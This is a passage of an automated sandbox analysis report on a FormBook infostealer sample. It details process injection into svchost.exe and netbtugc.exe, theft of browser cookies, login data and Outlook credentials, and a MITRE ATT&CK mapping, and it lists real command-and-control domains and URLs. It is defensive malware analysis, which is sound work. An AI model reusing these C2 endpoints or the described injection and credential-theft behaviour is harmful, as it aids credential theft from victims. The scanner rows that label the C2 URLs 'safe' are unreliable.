            Source: C:\Program Files (x86)\TDdSfBzfXovnKqobPdHqRRpMHdJbtbaVAvEsSnaXrShDnnQXWCINlPMeJBjZvM\rYmePGTGlPk.exeNtQueryVolumeInformationFile: Direct from: 0x76EF2F2CJump to behavior
            Source: C:\Program Files (x86)\TDdSfBzfXovnKqobPdHqRRpMHdJbtbaVAvEsSnaXrShDnnQXWCINlPMeJBjZvM\rYmePGTGlPk.exeNtQuerySystemInformation: Direct from: 0x76EF48CCJump to behavior
            Source: C:\Program Files (x86)\TDdSfBzfXovnKqobPdHqRRpMHdJbtbaVAvEsSnaXrShDnnQXWCINlPMeJBjZvM\rYmePGTGlPk.exeNtOpenSection: Direct from: 0x76EF2E0CJump to behavior
            Source: C:\Program Files (x86)\TDdSfBzfXovnKqobPdHqRRpMHdJbtbaVAvEsSnaXrShDnnQXWCINlPMeJBjZvM\rYmePGTGlPk.exeNtDeviceIoControlFile: Direct from: 0x76EF2AECJump to behavior
            Source: C:\Program Files (x86)\TDdSfBzfXovnKqobPdHqRRpMHdJbtbaVAvEsSnaXrShDnnQXWCINlPMeJBjZvM\rYmePGTGlPk.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BECJump to behavior
            Source: C:\Program Files (x86)\TDdSfBzfXovnKqobPdHqRRpMHdJbtbaVAvEsSnaXrShDnnQXWCINlPMeJBjZvM\rYmePGTGlPk.exeNtQueryInformationToken: Direct from: 0x76EF2CACJump to behavior
            Source: C:\Program Files (x86)\TDdSfBzfXovnKqobPdHqRRpMHdJbtbaVAvEsSnaXrShDnnQXWCINlPMeJBjZvM\rYmePGTGlPk.exeNtCreateFile: Direct from: 0x76EF2FECJump to behavior
            Source: C:\Program Files (x86)\TDdSfBzfXovnKqobPdHqRRpMHdJbtbaVAvEsSnaXrShDnnQXWCINlPMeJBjZvM\rYmePGTGlPk.exeNtOpenFile: Direct from: 0x76EF2DCCJump to behavior
            Source: C:\Program Files (x86)\TDdSfBzfXovnKqobPdHqRRpMHdJbtbaVAvEsSnaXrShDnnQXWCINlPMeJBjZvM\rYmePGTGlPk.exeNtTerminateThread: Direct from: 0x76EF2FCCJump to behavior
            Source: C:\Program Files (x86)\TDdSfBzfXovnKqobPdHqRRpMHdJbtbaVAvEsSnaXrShDnnQXWCINlPMeJBjZvM\rYmePGTGlPk.exeNtOpenKeyEx: Direct from: 0x76EF2B9CJump to behavior
            Source: C:\Program Files (x86)\TDdSfBzfXovnKqobPdHqRRpMHdJbtbaVAvEsSnaXrShDnnQXWCINlPMeJBjZvM\rYmePGTGlPk.exeNtSetInformationProcess: Direct from: 0x76EF2C5CJump to behavior
            Source: C:\Program Files (x86)\TDdSfBzfXovnKqobPdHqRRpMHdJbtbaVAvEsSnaXrShDnnQXWCINlPMeJBjZvM\rYmePGTGlPk.exeNtProtectVirtualMemory: Direct from: 0x76EF2F9CJump to behavior
            Source: C:\Program Files (x86)\TDdSfBzfXovnKqobPdHqRRpMHdJbtbaVAvEsSnaXrShDnnQXWCINlPMeJBjZvM\rYmePGTGlPk.exeNtWriteVirtualMemory: Direct from: 0x76EF2E3CJump to behavior
            Source: C:\Program Files (x86)\TDdSfBzfXovnKqobPdHqRRpMHdJbtbaVAvEsSnaXrShDnnQXWCINlPMeJBjZvM\rYmePGTGlPk.exeNtNotifyChangeKey: Direct from: 0x76EF3C2CJump to behavior
            Source: C:\Program Files (x86)\TDdSfBzfXovnKqobPdHqRRpMHdJbtbaVAvEsSnaXrShDnnQXWCINlPMeJBjZvM\rYmePGTGlPk.exeNtCreateMutant: Direct from: 0x76EF35CCJump to behavior
            Source: C:\Program Files (x86)\TDdSfBzfXovnKqobPdHqRRpMHdJbtbaVAvEsSnaXrShDnnQXWCINlPMeJBjZvM\rYmePGTGlPk.exeNtResumeThread: Direct from: 0x76EF36ACJump to behavior
            Source: C:\Program Files (x86)\TDdSfBzfXovnKqobPdHqRRpMHdJbtbaVAvEsSnaXrShDnnQXWCINlPMeJBjZvM\rYmePGTGlPk.exeNtMapViewOfSection: Direct from: 0x76EF2D1CJump to behavior
            Source: C:\Program Files (x86)\TDdSfBzfXovnKqobPdHqRRpMHdJbtbaVAvEsSnaXrShDnnQXWCINlPMeJBjZvM\rYmePGTGlPk.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BFCJump to behavior
            Source: C:\Program Files (x86)\TDdSfBzfXovnKqobPdHqRRpMHdJbtbaVAvEsSnaXrShDnnQXWCINlPMeJBjZvM\rYmePGTGlPk.exeNtQuerySystemInformation: Direct from: 0x76EF2DFCJump to behavior
            Source: C:\Program Files (x86)\TDdSfBzfXovnKqobPdHqRRpMHdJbtbaVAvEsSnaXrShDnnQXWCINlPMeJBjZvM\rYmePGTGlPk.exeNtReadFile: Direct from: 0x76EF2ADCJump to behavior
            Source: C:\Program Files (x86)\TDdSfBzfXovnKqobPdHqRRpMHdJbtbaVAvEsSnaXrShDnnQXWCINlPMeJBjZvM\rYmePGTGlPk.exeNtDelayExecution: Direct from: 0x76EF2DDCJump to behavior
            Source: C:\Program Files (x86)\TDdSfBzfXovnKqobPdHqRRpMHdJbtbaVAvEsSnaXrShDnnQXWCINlPMeJBjZvM\rYmePGTGlPk.exeNtQueryInformationProcess: Direct from: 0x76EF2C26Jump to behavior
            Source: C:\Program Files (x86)\TDdSfBzfXovnKqobPdHqRRpMHdJbtbaVAvEsSnaXrShDnnQXWCINlPMeJBjZvM\rYmePGTGlPk.exeNtResumeThread: Direct from: 0x76EF2FBCJump to behavior
            Source: C:\Program Files (x86)\TDdSfBzfXovnKqobPdHqRRpMHdJbtbaVAvEsSnaXrShDnnQXWCINlPMeJBjZvM\rYmePGTGlPk.exeNtCreateUserProcess: Direct from: 0x76EF371CJump to behavior
            Source: C:\Program Files (x86)\TDdSfBzfXovnKqobPdHqRRpMHdJbtbaVAvEsSnaXrShDnnQXWCINlPMeJBjZvM\rYmePGTGlPk.exeNtAllocateVirtualMemory: Direct from: 0x76EF3C9CJump to behavior
            Source: C:\Program Files (x86)\TDdSfBzfXovnKqobPdHqRRpMHdJbtbaVAvEsSnaXrShDnnQXWCINlPMeJBjZvM\rYmePGTGlPk.exeNtWriteVirtualMemory: Direct from: 0x76EF490CJump to behavior
            Source: C:\Program Files (x86)\TDdSfBzfXovnKqobPdHqRRpMHdJbtbaVAvEsSnaXrShDnnQXWCINlPMeJBjZvM\rYmePGTGlPk.exeNtSetInformationThread: Direct from: 0x76EE63F9Jump to behavior
            Source: C:\Program Files (x86)\TDdSfBzfXovnKqobPdHqRRpMHdJbtbaVAvEsSnaXrShDnnQXWCINlPMeJBjZvM\rYmePGTGlPk.exeNtClose: Direct from: 0x76EF2B6C
            Source: C:\Program Files (x86)\TDdSfBzfXovnKqobPdHqRRpMHdJbtbaVAvEsSnaXrShDnnQXWCINlPMeJBjZvM\rYmePGTGlPk.exeNtSetInformationThread: Direct from: 0x76EF2B4CJump to behavior
            Source: C:\Program Files (x86)\TDdSfBzfXovnKqobPdHqRRpMHdJbtbaVAvEsSnaXrShDnnQXWCINlPMeJBjZvM\rYmePGTGlPk.exeNtReadVirtualMemory: Direct from: 0x76EF2E8CJump to behavior
            Source: C:\Program Files (x86)\TDdSfBzfXovnKqobPdHqRRpMHdJbtbaVAvEsSnaXrShDnnQXWCINlPMeJBjZvM\rYmePGTGlPk.exeNtCreateKey: Direct from: 0x76EF2C6CJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\TDdSfBzfXovnKqobPdHqRRpMHdJbtbaVAvEsSnaXrShDnnQXWCINlPMeJBjZvM\rYmePGTGlPk.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\netbtugc.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: NULL target: C:\Program Files (x86)\TDdSfBzfXovnKqobPdHqRRpMHdJbtbaVAvEsSnaXrShDnnQXWCINlPMeJBjZvM\rYmePGTGlPk.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: NULL target: C:\Program Files (x86)\TDdSfBzfXovnKqobPdHqRRpMHdJbtbaVAvEsSnaXrShDnnQXWCINlPMeJBjZvM\rYmePGTGlPk.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\netbtugc.exeThread register set: target process: 5624Jump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\netbtugc.exeThread APC queued: target process: C:\Program Files (x86)\TDdSfBzfXovnKqobPdHqRRpMHdJbtbaVAvEsSnaXrShDnnQXWCINlPMeJBjZvM\rYmePGTGlPk.exeJump to behavior
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 47B008Jump to behavior
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeCode function: 0_2_000BBE95 LogonUserW,0_2_000BBE95
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeCode function: 0_2_0008374E GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,0_2_0008374E
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeCode function: 0_2_000C4B52 SendInput,keybd_event,0_2_000C4B52
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeCode function: 0_2_000C7DD5 mouse_event,0_2_000C7DD5
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe"Jump to behavior
            Source: C:\Program Files (x86)\TDdSfBzfXovnKqobPdHqRRpMHdJbtbaVAvEsSnaXrShDnnQXWCINlPMeJBjZvM\rYmePGTGlPk.exeProcess created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeCode function: 0_2_000BB398 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_000BB398
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeCode function: 0_2_000BBE31 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_000BBE31
            Source: rYmePGTGlPk.exe, 00000005.00000000.2503856099.0000000001541000.00000002.00000001.00040000.00000000.sdmp, rYmePGTGlPk.exe, 00000005.00000002.3347107549.0000000001541000.00000002.00000001.00040000.00000000.sdmp, rYmePGTGlPk.exe, 00000007.00000002.3346907528.0000000001491000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
            Source: r3T-ENQ-O-2024-10856.exe, rYmePGTGlPk.exe, 00000005.00000000.2503856099.0000000001541000.00000002.00000001.00040000.00000000.sdmp, rYmePGTGlPk.exe, 00000005.00000002.3347107549.0000000001541000.00000002.00000001.00040000.00000000.sdmp, rYmePGTGlPk.exe, 00000007.00000002.3346907528.0000000001491000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: rYmePGTGlPk.exe, 00000005.00000000.2503856099.0000000001541000.00000002.00000001.00040000.00000000.sdmp, rYmePGTGlPk.exe, 00000005.00000002.3347107549.0000000001541000.00000002.00000001.00040000.00000000.sdmp, rYmePGTGlPk.exe, 00000007.00000002.3346907528.0000000001491000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: r3T-ENQ-O-2024-10856.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
            Source: rYmePGTGlPk.exe, 00000005.00000000.2503856099.0000000001541000.00000002.00000001.00040000.00000000.sdmp, rYmePGTGlPk.exe, 00000005.00000002.3347107549.0000000001541000.00000002.00000001.00040000.00000000.sdmp, rYmePGTGlPk.exe, 00000007.00000002.3346907528.0000000001491000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeCode function: 0_2_000A7254 cpuid 0_2_000A7254
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeCode function: 0_2_000A40DA GetSystemTimeAsFileTime,__aulldiv,0_2_000A40DA
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeCode function: 0_2_000FC146 GetUserNameW,0_2_000FC146
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeCode function: 0_2_000B2C3C __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_000B2C3C
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeCode function: 0_2_0009E47B GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_0009E47B

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.380000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.380000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000002.2584333644.0000000003160000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3345963921.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3347470009.00000000036C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3347537099.0000000003710000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2583640738.0000000000380000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3347630657.00000000035F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3347309941.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2584390096.0000000003E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\netbtugc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
            Source: r3T-ENQ-O-2024-10856.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 10, 2USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytea
            Source: r3T-ENQ-O-2024-10856.exeBinary or memory string: WIN_81
            Source: r3T-ENQ-O-2024-10856.exeBinary or memory string: WIN_XP
            Source: r3T-ENQ-O-2024-10856.exeBinary or memory string: WIN_XPe
            Source: r3T-ENQ-O-2024-10856.exeBinary or memory string: WIN_VISTA
            Source: r3T-ENQ-O-2024-10856.exeBinary or memory string: WIN_7
            Source: r3T-ENQ-O-2024-10856.exeBinary or memory string: WIN_8

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.380000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.380000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000002.2584333644.0000000003160000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3345963921.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3347470009.00000000036C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3347537099.0000000003710000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2583640738.0000000000380000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3347630657.00000000035F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3347309941.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2584390096.0000000003E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeCode function: 0_2_000D91DC socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_000D91DC
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeCode function: 0_2_000D96E2 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_000D96E2

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure2
            Valid Accounts            		2
            Native API            		1
            DLL Side-Loading            		1
            Exploitation for Privilege Escalation            		1
            Disable or Modify Tools            		1
            OS Credential Dumping            		2
            System Time Discovery            		Remote Services1
            Archive Collected Data            		4
            Ingress Tool Transfer            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/Job2
            Valid Accounts            		1
            Abuse Elevation Control Mechanism            		1
            Deobfuscate/Decode Files or Information            		21
            Input Capture            		1
            Account Discovery            		Remote Desktop Protocol1
            Data from Local System            		1
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		1
            Abuse Elevation Control Mechanism            		Security Account Manager2
            File and Directory Discovery            		SMB/Windows Admin Shares1
            Email Collection            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
            Valid Accounts            		3
            Obfuscated Files or Information            		NTDS116
            System Information Discovery            		Distributed Component Object Model21
            Input Capture            		4
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
            Access Token Manipulation            		1
            DLL Side-Loading            		LSA Secrets151
            Security Software Discovery            		SSH3
            Clipboard Data            		Fallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
            Process Injection            		2
            Valid Accounts            		Cached Domain Credentials2
            Virtualization/Sandbox Evasion            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
            Virtualization/Sandbox Evasion            		DCSync3
            Process Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
            Access Token Manipulation            		Proc Filesystem11
            Application Window Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
            Process Injection            		/etc/passwd and /etc/shadow1
            System Owner/User Discovery            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1510735 Sample: r3T-ENQ-O-2024-10856.exe Startdate: 13/09/2024 Architecture: WINDOWS Score: 100 28 www.mediaplug.biz 2->28 30 www.masteriocp.online 2->30 32 5 other IPs or domains 2->32 42 Suricata IDS alerts for network traffic 2->42 44 Malicious sample detected (through community Yara rule) 2->44 46 Multi AV Scanner detection for submitted file 2->46 48 3 other signatures 2->48 10 r3T-ENQ-O-2024-10856.exe 3 2->10         started        signatures3 process4 signatures5 60 Writes to foreign memory regions 10->60 62 Maps a DLL or memory area into another process 10->62 64 Switches to a custom stack to bypass stack traces 10->64 13 svchost.exe 10->13         started        process6 signatures7 66 Maps a DLL or memory area into another process 13->66 16 rYmePGTGlPk.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 netbtugc.exe 13 16->19         started        process10 signatures11 50 Tries to steal Mail credentials (via file / registry access) 19->50 52 Tries to harvest and steal browser information (history, passwords, etc) 19->52 54 Modifies the context of a thread in another process (thread injection) 19->54 56 3 other signatures 19->56 22 rYmePGTGlPk.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.independent200.org 103.42.108.46, 61309, 80 SYNERGYWHOLESALE-APSYNERGYWHOLESALEPTYLTDAU Australia 22->34 36 www.mediaplug.biz 66.81.203.10, 61307, 61308, 80 CONFLUENCE-NETWORK-INCVG Virgin Islands (BRITISH) 22->36 38 2 other IPs or domains 22->38 58 Found direct / indirect Syscall (likely to bypass EDR) 22->58 signatures14

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            r3T-ENQ-O-2024-10856.exe26%ReversingLabs
            r3T-ENQ-O-2024-10856.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
            https://duckduckgo.com/ac/?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
            http://www.mediaplug.biz/osde/?GHSh-Tth=RWxN1EBNqsrI97gRZZLgxxJS1816+Tom3eCTWsUjqsqAz5HjDo5OrFUtMmzwWkvzE1VCadoWcR1nh8rv/P1sPWqJU3bviStab5pw4zunthcPnIDJoH7elLKb+pwDrPWt7Q==&1Hqh=_NtDd0%Avira URL Cloudsafe
            http://www.chamadaslotgiris.net/gqyt/?GHSh-Tth=NZeSp/M8BkILDmxjoR6EHyrE2kg7hHPRGifz0/tmVi2b1oVO5NeHeL2ulzOnf4Iy2ctjEvS834w05gMs6MQykA5Xt3rjq5i1um85DwW90kuO6Jainieo24Gz0Ls55ZIPYw==&1Hqh=_NtDd0%Avira URL Cloudsafe
            http://www.masteriocp.online/p5rq/?GHSh-Tth=RytyLV2sDE3KAjid6ijyBws804BTuHo2xv60Q0DZuFoqqvUh/Zvb/zR4+xNnv9lNk3zYZu+tANFIvcmMVMI5BxIUOARFC/F7kb9hzkdtOwUlduKX5dZAlA2NzH1X/KLd6Q==&1Hqh=_NtDd0%Avira URL Cloudsafe
            https://www.masteriocp.online/p5rq/?GHSh-Tth=RytyLV2sDE3KAjid6ijyBws804BTuHo2xv60Q0DZuFoqqvUh/Zvb/zR0%Avira URL Cloudsafe
            http://www.masteriocp.online/p5rq/0%Avira URL Cloudsafe
            http://www.independent200.org0%Avira URL Cloudsafe
            http://www.mediaplug.biz/osde/0%Avira URL Cloudsafe
            http://www.independent200.org/yl6y/0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            www.independent200.org
            		103.42.108.46
            		truetrue
              		unknown
              chamadaslotgiris.net
              		3.33.130.190
              		truetrue
                		unknown
                dns.ladipage.com
                		13.228.81.39
                		truetrue
                  		unknown
                  www.mediaplug.biz
                  		66.81.203.10
                  		truetrue
                    		unknown
                    www.linkbasic.net
                    		unknown
                    		unknowntrue
                      		unknown
                      www.masteriocp.online
                      		unknown
                      		unknowntrue
                        		unknown
                        www.chamadaslotgiris.net
                        		unknown
                        		unknowntrue
                          		unknown

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          http://www.mediaplug.biz/osde/?GHSh-Tth=RWxN1EBNqsrI97gRZZLgxxJS1816+Tom3eCTWsUjqsqAz5HjDo5OrFUtMmzwWkvzE1VCadoWcR1nh8rv/P1sPWqJU3bviStab5pw4zunthcPnIDJoH7elLKb+pwDrPWt7Q==&1Hqh=_NtDdtrue
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.masteriocp.online/p5rq/true
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.independent200.org/yl6y/true
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.chamadaslotgiris.net/gqyt/?GHSh-Tth=NZeSp/M8BkILDmxjoR6EHyrE2kg7hHPRGifz0/tmVi2b1oVO5NeHeL2ulzOnf4Iy2ctjEvS834w05gMs6MQykA5Xt3rjq5i1um85DwW90kuO6Jainieo24Gz0Ls55ZIPYw==&1Hqh=_NtDdtrue
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.mediaplug.biz/osde/true
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.masteriocp.online/p5rq/?GHSh-Tth=RytyLV2sDE3KAjid6ijyBws804BTuHo2xv60Q0DZuFoqqvUh/Zvb/zR4+xNnv9lNk3zYZu+tANFIvcmMVMI5BxIUOARFC/F7kb9hzkdtOwUlduKX5dZAlA2NzH1X/KLd6Q==&1Hqh=_NtDdtrue
                          • Avira URL Cloud: safe
                          		unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          https://ac.ecosia.org/autocomplete?q=netbtugc.exe, 00000006.00000002.3349934209.00000000082C8000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.independent200.orgrYmePGTGlPk.exe, 00000007.00000002.3347309941.0000000002A81000.00000040.80000000.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://duckduckgo.com/chrome_newtabnetbtugc.exe, 00000006.00000002.3349934209.00000000082C8000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://duckduckgo.com/ac/?q=netbtugc.exe, 00000006.00000002.3349934209.00000000082C8000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
